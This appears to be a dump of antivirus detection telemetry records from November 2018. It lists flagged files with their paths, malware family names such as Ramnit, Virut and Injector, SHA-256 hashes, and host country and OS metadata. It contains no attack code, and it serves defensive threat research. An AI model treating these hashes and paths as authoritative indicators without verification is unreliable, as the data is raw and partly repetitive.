  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='unt9638.tmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\U9628.tmp\\UNT9638.tmp.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='2125f8fd52552fbd9a9d2f828302c672f5ab14bf17d51c8ad3345ab1dff9a80f', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yolo.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsvF44E.tmp\\yolo.dll', filesize=128000, name='PUA/Outbrowse.Gen.#M300.#R5697'), hash='46afe34ef9bcc3e2d76bd85f73235cabd22982b29ac85e5b8415ecb72fb10760', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\DownLoad\\SF9\\sotpatchv3.2\\sotpatchv3.2\\softpatcher.exe', parentsize=None, timestamp='2018-11-02T17:16:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='D:\\Tool\\Miracle Box V2.27A Crack\\Miracle Box 2.27A Crack\\Miracle Box 2.27A Crack\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='192bbada9657ae3c8726276206a4bd97e7efa016dd7b15591dabd30876056a45', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:38:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\06BB2F3F4067B24380E3D984A75ED522EA72E0FAF16425D0BB64BB127464322B', filesize=64000, name='TR/Dropper.Gen.#M300.#R3497'), hash='06bb2f3f4067b24380e3d984a75ed522ea72e0faf16425d0bb64bb127464322b', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T09:39:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='password_idm.exe', filepath='D:\\Users\\X\\AppData\\Local\\Temp\\7ZipSfx.000\\password_IDM.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='35db408b7e00c3a0201978750faafc034292a9caf7bcf9f12d0a5889f03e385c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:43:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:53:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stripclb.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\DATA\\MAPS\\STRIPCLB\\STRIPCLB.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='1320b4bef6bca83e6e5347ff8718e51c7d01b00eb5b2eccf9c2755c0fff930cd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xerces-c_1_6_0.dll', filepath='D:\\AutoCAD2009\\x86\\xerces-c_1_6_0.dll', filesize=1536000, name='W32/Ramnit.A.#M1.#R1'), hash='44d73b70f5bc66adb08c739dd549e80534b79cc3b6a7507b3aea447f58425db0', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:46:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102757-51d82787', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d543351\\AVSCAN-20181102-102641-490633FA\\AVSCAN-20181102-102757-51D82787', filesize=1600000, name='Adware/DealPly.bqeij.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:28:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='grab.exe', filepath='C:\\Users\\X\\Desktop\\hzg_laptop\\nichtsoguteMasterarbeitStunmpf\\Anlage\\APPENDIX C\\4_2_Vorbereitungen\\pylon 5\\Development\\Samples\\C++\\Debug\\Grab.exe', filesize=64000, name='HEUR/AGEN.1018982.#M1.#R1'), hash='483b694e3b1fbd7714782a0862377dc7d509c2316eee1b3068e5bc9c6541ec5b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-02T14:59:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p008', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T093924-14317/parts/p008', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:18:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maxiget.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\TMP\\MaxiGet.exe', filesize=636000, name='TR/Agent.636000.#M1.#R1'), hash='5b8c7bfc05c4445a2366993e01e610646f4d7fa5bce5cd80d4dac5071c3814d8', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122151-6c1f1910', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122151-6C1F1910', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dwr_insert_bar_objects_io_06.html', filepath='C:\\Program Files\\Common Files\\Adobe\\Help\\en_US\\Dreamweaver\\9.0_Extending\\dwr_insert_bar_objects_io_06.html', filesize=116000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='6a2db1ade29fe7e745d7cf030d0bfa768c501fa78c6fd14856670bf02d28256f', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:41:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125051-af74eab8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-125051-AF74EAB8', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:53:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-010317-4ed51ba2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e68110d4\\AVSCAN-20181102-010221-4707488C\\AVSCAN-20181102-010317-4ED51BA2', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061247-49f1d651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061247-49F1D651', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autorun.exe', filepath='C:\\Users\\X\\Desktop\\QB.06 UK\\autorun.exe', filesize=320000, name='TR/Patched.Ren.Gen4.#M300.#R300211'), hash='6d3a21e6be53a3d7c70688ba41d18b748910eeb4f19d6d1b9b2e84ea5f60b3bb', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T06:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120530-142c0da6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120530-142C0DA6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123535-0550c62c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-123535-0550C62C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:38:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051513-3f28aec5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051513-3F28AEC5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='blfunpark.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\blfunpark\\blfunpark.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053221-a4002c74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053221-A4002C74', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053203-99454a1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053203-99454A1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='roxnaiyh.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\ROXnAiYH.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052503-9f032d81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052503-9F032D81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-182549-3f0d0d5e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce1c3899\\AVSCAN-20181102-182446-3758645C\\AVSCAN-20181102-182549-3F0D0D5E', filesize=2048000, name='TR/Agent.qhhxz.#M1.#R1'), hash='6e4de412fb1dbf07c9133c38f9329dab3a1c3e68df9284693ff33064794cad97', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:25:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053217-a1880d0e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053217-A1880D0E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050354-aa6ca819', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050354-AA6CA819', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181102T100503-00018/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T12:30:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\49F0FF1BF24FD1C0C796F0ACA91AFA7AB791AFC1DAA8F206D4E052DDA7C78A37', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='49f0ff1bf24fd1c0c796f0aca91afa7ab791afc1daa8f206d4e052dda7c78a37', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:35:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053238-ae0b16cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053238-AE0B16CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054247-197cec28', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054247-197CEC28', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054617-967d82c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054617-967D82C5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060204-cab68e58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060204-CAB68E58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052800-08e4b459', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052800-08E4B459', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060328-fcb8879f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060328-FCB8879F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061640-d5245dfe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061640-D5245DFE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052308-5a8e2981', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052308-5A8E2981', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060319-f7c53aea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060319-F7C53AEA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052933-3fd0a929', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052933-3FD0A929', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051026-942d1502', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051026-942D1502', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053620-32e3ba93', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053620-32E3BA93', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:19Z'), dt=datetime.date(2018, 11, 2)),
